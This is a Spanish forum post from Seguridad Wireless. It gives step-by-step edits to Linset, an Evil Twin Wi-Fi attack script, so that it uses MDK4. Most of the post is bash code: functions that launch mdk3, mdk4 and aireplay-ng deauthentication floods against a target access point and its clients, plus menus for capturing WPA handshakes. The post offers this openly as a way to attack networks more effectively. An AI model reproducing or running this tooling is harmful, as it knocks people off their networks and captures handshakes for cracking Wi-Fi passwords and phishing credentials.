Seguridad Wireless - Wifi

Suite Seguridad Wireless => Live wifislax => Mensaje iniciado por: Enol321 en 14-10-2020, 20:02 (Miércoles)

Título: Linset con MDK4 (wifislax 64 2.2)
Publicado por: Enol321 en 14-10-2020, 20:02 (Miércoles)
Bien con la mejor intencion vamos a mejorar modestamente este mitico Evil Twin solo vamos a cambiar lo fundamental cambios quirurjicos poner  ATAQUE  Y CAPTURA handshake con MDK4 que son los procesos importantes.... en la version wifislax 64 2.2 ya existe mdk4 de serie mas facil 

1º abir gestor de archivos
2º  con el cursor buscamos en el lateral  usr y clic
3º  ir a carpeta Bin clic
4º   buscar linset suele estar por la mitad colocarse encima y con los botones del raton clic y abri con Kwrite
5º   se nos abre el codigp  maximizamos y nos dirigimoa la linea numero 579 copiar y pegar inmediatamente lo mismo pero cambiando DOMDE ESTE MDK3 POR MDK4

echo -ne "Mdk3............"
   if ! hash mdk3 2>/dev/null; then
      echo -e "\e[1;31mNot installed"$rescolor""
      salir=1
   else
      echo -e "\e[1;32mOK!"$rescolor""
   fi
   sleep 0.025
PEGAR codigo nuevo justo despues lineas 586

echo -ne "Mdk4............"
   if ! hash mdk4 2>/dev/null; then
      echo -e "\e[1;31mNot installed"$rescolor""
      salir=1
   else
      echo -e "\e[1;32mOK!"$rescolor""
   fi
   sleep 0.025
continuamos con lo siguiente nos vamos en el codigo a las lineas  1742  LO  MAS IMPORTANTE EL ATEQUE esta con mdk3 y lo cambiamos por mdk4 mismas lineas

echo "$(strings $DUMP_PATH/dump-02.csv | cut -d "," -f1,14 | grep -h "$Host_SSID" | cut -d "," -f1)" >$DUMP_PATH/mdk3.txt
   xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautentificando con mdk3 a todos de $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &

echo "$(strings $DUMP_PATH/dump-02.csv | cut -d "," -f1,14 | grep -h "$Host_SSID" | cut -d "," -f1)" >$DUMP_PATH/mdk4.txt
   xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautentificando con mdk4 a  $Host_SSID" -e mdk4 $WIFI_MONITOR d -b $DUMP_PATH/mdk4.txt -c $Host_CHAN &

 continuamos ...bueno con esto ya vale asi para atacar con mdk4 que es lo fundamental-pero cambairemos la captura de handshake que esta con MDK3 x MDK4 por si es revelde la red que alguna puñeteras pero se puede seguir capturando con aireplay-ng o mdk3 vale es otra opcion ...vamos a la linea   1216  : le podremos otra opcion mas la de Mdk4 como esta copiar y pegar  asi salen aireplay mdk3 mdk4 y desaut. especifica al AP objetivo bien top
############################################# < HANDSHAKE > ############################################

# Tipo de Deauth que se va a realizar
function askclientsel {
   
   conditional_clear
   
   while true; do
      mostrarheader
      
      echo "CAPTURAR HANDSHAKE DEL CLIENTE"
      echo "                                       "
      echo -e "      "$verde"1)"$rescolor" Realizar desaut. masiva al AP objetivo"
      echo -e "      "$verde"2)"$rescolor" Realizar desaut. masiva al AP (mdk3)"
      echo -e "      "$verde"3)"$rescolor" Realizar desaut. masiva al AP (mdk4)"
      echo -e "      "$verde"4)"$rescolor" Realizar desaut. especifica al AP objetivo"
      echo -e "      "$verde"5)"$rescolor" Volver a escanear las redes"
      echo -e "      "$verde"6)"$rescolor" Salir"
      echo "                                       "
      echo -n "      #> "
      read yn
      echo ""
      case $yn in
         1 ) deauth all; break ;;
         2 ) deauth mdk3; break ;;
         3 ) deauth mdk4; break ;;
         4 ) deauth esp; break ;;
         5 ) killall airodump-ng &>$linset_output_device; vk496; break;;   
         6 ) exitmode; break ;;
         * ) echo "Opción desconocida. Elige de nuevo"; conditional_clear ;;
      esac
   done
   
}

#
function deauth {
   
   conditional_clear
   
   iwconfig $WIFI_MONITOR channel $Host_CHAN
   
   case $1 in
      all )
         DEAUTH=deauthall
         capture & $DEAUTH
         CSVDB=$Host_MAC-01.csv
      ;;
      mdk3 )
         DEAUTH=deauthmdk3
         capture & $DEAUTH &
         CSVDB=$Host_MAC-01.csv
      ;;
      mdk4 )
         DEAUTH=deauthmdk4
         capture & $DEAUTH &
         CSVDB=$Host_MAC-01.csv
      ;;
      esp )
         DEAUTH=deauthesp
         HOST=`cat $DUMP_PATH/$CSVDB | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v $Host_MAC`
         LINEAS_CLIENTES=`echo "$HOST" | wc -m | awk '{print $1}'`
         
         if [ $LINEAS_CLIENTES -le 5 ]; then
            DEAUTH=deauthall
            capture & $DEAUTH
            CSVDB=$Host_MAC-01.csv
            deauth
            
         fi
         
         capture
         for CLIENT in $HOST; do
            Client_MAC=`echo ${CLIENT:0:17}`   
            deauthesp
         done
         $DEAUTH
         CSVDB=$Host_MAC-01.csv
      ;;
   esac
   
   
   deauthMENU
   
}

function deauthMENU {
   
   Handshake_statuscheck="${gris}Sin handshake$rescolor"
   
   while true; do
      conditional_clear
      mostrarheader
      
      echo "¿SE CAPTURÓ el HANDSHAKE?"
      echo
      echo -e "Estado del handshake: $Handshake_statuscheck"
      echo
      echo -e "      "$verde"1)"$rescolor" Si"
      echo -e "      "$verde"2)"$rescolor" No (lanzar ataque de nuevo)"
      echo -e "      "$verde"3)"$rescolor" No (seleccionar otro ataque)" 
      echo -e "      "$verde"4)"$rescolor" Seleccionar otra red" 
      echo -e "      "$verde"5)"$rescolor" Salir"
      echo " "
      echo -n '      #> '
      read yn
      
      case $yn in
         1 ) checkhandshake;;
         2 ) capture; $DEAUTH & ;;
         3 ) conditional_clear; askclientsel; break;;
         4 ) killall airodump-ng &>$linset_output_device; CSVDB=dump-01.csv; breakmode=1; selection; break ;;
         5 ) exitmode; break;;
         * ) echo "Opción desconocida. Elige de nuevo"; conditional_clear ;;
      esac
      
   done
}






seguimos vamos a las lineas  1942

# Deauth a todos
function deauthall {
   
   xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando a todos de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
}

function deauthmdk3 {
   
   echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
   xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando mdk3 a todos de $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
   mdk3PID=$!
   sleep 15
   kill $mdk3PID &>$linset_output_device
}

function deauthmdk4 {
   
   echo "$Host_MAC" >$DUMP_PATH/mdk4.txt
   xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando mdk4 a todos de $Host_SSID" -e mdk4 $WIFI_MONITOR d -b $DUMP_PATH/mdk4.txt -c $Host_CHAN &
   mdk4PID=$!
   sleep 30
   kill $mdk4PID &>$linset_output_device
}
# Deauth a un cliente específico
function deauthesp {
   
   sleep 2
   xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando a $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &
}

...ademas cambairemos  sleep 15 a 45 60 que es la duracion  ventana....eso al gusto se puede dejar como esta y ya terminamos  dar con el cursor en  guardar despues ya podemos iniciar linset con normalidad la captura ataque con MDK4 guardarlo en disco duro para no perderlo al cerrar ... AHORA SI TOP TOP ....espero claro

para versiones anreriores de wifislax hasta w 66 1.1 es necesario bajarse Mdk4 y ejecutarlo ....a disfrutar.